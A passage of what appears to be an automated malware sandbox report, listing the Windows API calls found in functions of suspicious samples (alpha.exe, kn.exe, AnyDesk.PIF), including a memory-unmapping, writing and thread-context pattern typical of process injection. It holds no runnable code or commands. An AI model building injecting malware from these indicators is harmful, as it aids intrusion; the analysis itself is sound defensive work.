                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF706EDBCF0
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF706EC88C0
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC89E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF706EC89E4
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF706EB3D94
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC898C NtQueryInformationToken,11_2_00007FF706EC898C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF706EE1538
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B3C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,12_2_00007FF627B3C964
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E08670 NtUnmapViewOfSection,15_2_02E08670
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E08400 NtReadVirtualMemory,15_2_02E08400
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E07A2C NtAllocateVirtualMemory,15_2_02E07A2C
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,15_2_02E0DC8C
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_02E0DC04
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E08D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,15_2_02E08D70
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,15_2_02E0DD70
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E07D78 NtWriteVirtualMemory,15_2_02E07D78
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E07A2A NtAllocateVirtualMemory,15_2_02E07A2A
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_02E0DBB0
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E08D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,15_2_02E08D6E
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,16_2_00007FF706EC7FF8
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,16_2_00007FF706EC8114
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,16_2_00007FF706EDBCF0
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,16_2_00007FF706EC88C0
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC89E4 NtQueryInformationToken,NtQueryInformationToken,16_2_00007FF706EC89E4
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,16_2_00007FF706EB3D94
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC898C NtQueryInformationToken,16_2_00007FF706EC898C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,16_2_00007FF706EE1538
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,17_2_00007FF706EC7FF8
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,17_2_00007FF706EC8114
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EDBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,17_2_00007FF706EDBCF0
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,17_2_00007FF706EC88C0
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC89E4 NtQueryInformationToken,NtQueryInformationToken,17_2_00007FF706EC89E4
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,17_2_00007FF706EB3D94
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC898C NtQueryInformationToken,17_2_00007FF706EC898C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EE1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,17_2_00007FF706EE1538
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF706EB5240
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,9_2_00007FF706EC4224
                      Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\8c4bfd40d4df6ab2.bin
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC37D89_2_00007FF706EC37D8
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC55549_2_00007FF706EC5554
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC0A6C9_2_00007FF706EC0A6C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EBAA549_2_00007FF706EBAA54
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC42249_2_00007FF706EC4224
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB34109_2_00007FF706EB3410
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB6BE09_2_00007FF706EB6BE0
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EDAFBC9_2_00007FF706EDAFBC
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB3F909_2_00007FF706EB3F90
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB5B709_2_00007FF706EB5B70
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB9B509_2_00007FF706EB9B50
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB372C9_2_00007FF706EB372C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB85109_2_00007FF706EB8510
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EBB0D89_2_00007FF706EBB0D8
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC18D49_2_00007FF706EC18D4
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB18849_2_00007FF706EB1884
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC78549_2_00007FF706EC7854
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EDAC4C9_2_00007FF706EDAC4C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB2C489_2_00007FF706EB2C48
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EBCE109_2_00007FF706EBCE10
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB8DF89_2_00007FF706EB8DF8
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EDD9D09_2_00007FF706EDD9D0
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB81D49_2_00007FF706EB81D4
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EE15389_2_00007FF706EE1538
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB7D309_2_00007FF706EB7D30
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706ED7F009_2_00007FF706ED7F00
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB6EE49_2_00007FF706EB6EE4
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EDEE889_2_00007FF706EDEE88
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EBE6809_2_00007FF706EBE680
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EBD2509_2_00007FF706EBD250
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB9E509_2_00007FF706EB9E50
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB76509_2_00007FF706EB7650
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB52409_2_00007FF706EB5240
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB4A309_2_00007FF706EB4A30
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EDAA309_2_00007FF706EDAA30
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB22209_2_00007FF706EB2220
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC37D811_2_00007FF706EC37D8
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC555411_2_00007FF706EC5554
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC0A6C11_2_00007FF706EC0A6C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EBAA5411_2_00007FF706EBAA54
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC422411_2_00007FF706EC4224
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB341011_2_00007FF706EB3410
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB6BE011_2_00007FF706EB6BE0
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EDAFBC11_2_00007FF706EDAFBC
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB3F9011_2_00007FF706EB3F90
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB5B7011_2_00007FF706EB5B70
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB9B5011_2_00007FF706EB9B50
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB372C11_2_00007FF706EB372C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB851011_2_00007FF706EB8510
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EBB0D811_2_00007FF706EBB0D8
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC18D411_2_00007FF706EC18D4
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB188411_2_00007FF706EB1884
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC785411_2_00007FF706EC7854
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EDAC4C11_2_00007FF706EDAC4C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB2C4811_2_00007FF706EB2C48
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EBCE1011_2_00007FF706EBCE10
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB8DF811_2_00007FF706EB8DF8
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EDD9D011_2_00007FF706EDD9D0
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB81D411_2_00007FF706EB81D4
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EE153811_2_00007FF706EE1538
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB7D3011_2_00007FF706EB7D30
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706ED7F0011_2_00007FF706ED7F00
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB6EE411_2_00007FF706EB6EE4
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EDEE8811_2_00007FF706EDEE88
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EBE68011_2_00007FF706EBE680
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EBD25011_2_00007FF706EBD250
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB9E5011_2_00007FF706EB9E50
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB765011_2_00007FF706EB7650
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB524011_2_00007FF706EB5240
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB4A3011_2_00007FF706EB4A30
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EDAA3011_2_00007FF706EDAA30
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB222011_2_00007FF706EB2220
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2F02012_2_00007FF627B2F020
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A52F3812_2_00007FF627A52F38
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2CCB812_2_00007FF627B2CCB8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B5380012_2_00007FF627B53800
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2C12012_2_00007FF627B2C120
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2BC1012_2_00007FF627B2BC10
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B248C412_2_00007FF627B248C4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B208C812_2_00007FF627B208C8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACE84412_2_00007FF627ACE844
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B3285412_2_00007FF627B32854
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACC7F012_2_00007FF627ACC7F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC27D012_2_00007FF627AC27D0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF07D012_2_00007FF627AF07D0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B3675012_2_00007FF627B36750
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAC6D012_2_00007FF627AAC6D0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABC6F812_2_00007FF627ABC6F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A505E012_2_00007FF627A505E0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0C63012_2_00007FF627B0C630
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA863012_2_00007FF627AA8630
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B485EC12_2_00007FF627B485EC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7857012_2_00007FF627A78570
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA655C12_2_00007FF627AA655C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B385A812_2_00007FF627B385A8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1453812_2_00007FF627B14538
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9258012_2_00007FF627A92580
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ADE57C12_2_00007FF627ADE57C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACE4F012_2_00007FF627ACE4F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A544E012_2_00007FF627A544E0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB24D412_2_00007FF627AB24D4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4C52012_2_00007FF627A4C520
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B284D812_2_00007FF627B284D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2049012_2_00007FF627B20490
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABA45012_2_00007FF627ABA450
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABC45012_2_00007FF627ABC450
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A864A812_2_00007FF627A864A8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD848812_2_00007FF627AD8488
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9848412_2_00007FF627A98484
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD43D012_2_00007FF627AD43D0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2E43012_2_00007FF627B2E430
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B5842F12_2_00007FF627B5842F
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4A42412_2_00007FF627A4A424
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC841412_2_00007FF627AC8414
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6441012_2_00007FF627A64410
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD637412_2_00007FF627AD6374
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8E3A012_2_00007FF627A8E3A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2234C12_2_00007FF627B2234C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA039812_2_00007FF627AA0398
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9E29C12_2_00007FF627A9E29C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB628012_2_00007FF627AB6280
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6227C12_2_00007FF627A6227C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2427412_2_00007FF627B24274
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B541F812_2_00007FF627B541F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACA1E812_2_00007FF627ACA1E8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9C1D012_2_00007FF627A9C1D0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0821C12_2_00007FF627B0821C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4817012_2_00007FF627A48170
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6014012_2_00007FF627A60140
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0511C12_2_00007FF627B0511C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5B09C12_2_00007FF627A5B09C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9D09412_2_00007FF627A9D094
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8107C12_2_00007FF627A8107C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4103012_2_00007FF627A41030
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE4F9412_2_00007FF627AE4F94
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A74F9012_2_00007FF627A74F90
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A46EF412_2_00007FF627A46EF4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7EED412_2_00007FF627A7EED4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A68F1C12_2_00007FF627A68F1C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B28EAC12_2_00007FF627B28EAC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B24E5812_2_00007FF627B24E58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6EDA412_2_00007FF627A6EDA4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B22D6C12_2_00007FF627B22D6C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB6D7C12_2_00007FF627AB6D7C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A98D2C12_2_00007FF627A98D2C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA2D1812_2_00007FF627AA2D18
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9CD1012_2_00007FF627A9CD10
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B38CF412_2_00007FF627B38CF4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD2CF812_2_00007FF627AD2CF8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A58D0012_2_00007FF627A58D00
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B4CC8C12_2_00007FF627B4CC8C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ADCCA812_2_00007FF627ADCCA8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B18C5812_2_00007FF627B18C58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABCC8012_2_00007FF627ABCC80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB8BD412_2_00007FF627AB8BD4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A90C2812_2_00007FF627A90C28
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4AC0812_2_00007FF627A4AC08
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8CBFC12_2_00007FF627A8CBFC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A64B6812_2_00007FF627A64B68
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF6B9412_2_00007FF627AF6B94
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A94B3012_2_00007FF627A94B30
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B14A4012_2_00007FF627B14A40
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B34A5812_2_00007FF627B34A58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2AA5812_2_00007FF627B2AA58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC6A8412_2_00007FF627AC6A84
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACEA7C12_2_00007FF627ACEA7C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAE9F012_2_00007FF627AAE9F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA09EC12_2_00007FF627AA09EC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACAA0012_2_00007FF627ACAA00
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1A9F012_2_00007FF627B1A9F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4294012_2_00007FF627A42940
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9899012_2_00007FF627A98990
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA698412_2_00007FF627AA6984
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A958CC12_2_00007FF627A958CC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ADD85812_2_00007FF627ADD858
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD184C12_2_00007FF627AD184C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA789012_2_00007FF627AA7890
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1387412_2_00007FF627B13874
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAD7F012_2_00007FF627AAD7F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB77C812_2_00007FF627AB77C8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A817D412_2_00007FF627A817D4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6183012_2_00007FF627A61830
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF382012_2_00007FF627AF3820
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5F80012_2_00007FF627A5F800
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC376012_2_00007FF627AC3760
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9979012_2_00007FF627A99790
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5B78812_2_00007FF627A5B788
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACF6D812_2_00007FF627ACF6D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1D6DC12_2_00007FF627B1D6DC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2767812_2_00007FF627B27678
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6D66012_2_00007FF627A6D660
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8564812_2_00007FF627A85648
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A976B012_2_00007FF627A976B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2363812_2_00007FF627B23638
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AFD6A012_2_00007FF627AFD6A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1566012_2_00007FF627B15660
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF767812_2_00007FF627AF7678
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA55F012_2_00007FF627AA55F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4F61012_2_00007FF627A4F610
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC95FC12_2_00007FF627AC95FC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7156C12_2_00007FF627A7156C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1958012_2_00007FF627B19580
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7B58C12_2_00007FF627A7B58C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABF52012_2_00007FF627ABF520
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B114F012_2_00007FF627B114F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AED46012_2_00007FF627AED460
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4543812_2_00007FF627A45438
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B394A812_2_00007FF627B394A8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8D44012_2_00007FF627A8D440
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A654A012_2_00007FF627A654A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF949412_2_00007FF627AF9494
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA747812_2_00007FF627AA7478
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8F43412_2_00007FF627A8F434
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B333D012_2_00007FF627B333D0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B433D412_2_00007FF627B433D4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABD41012_2_00007FF627ABD410
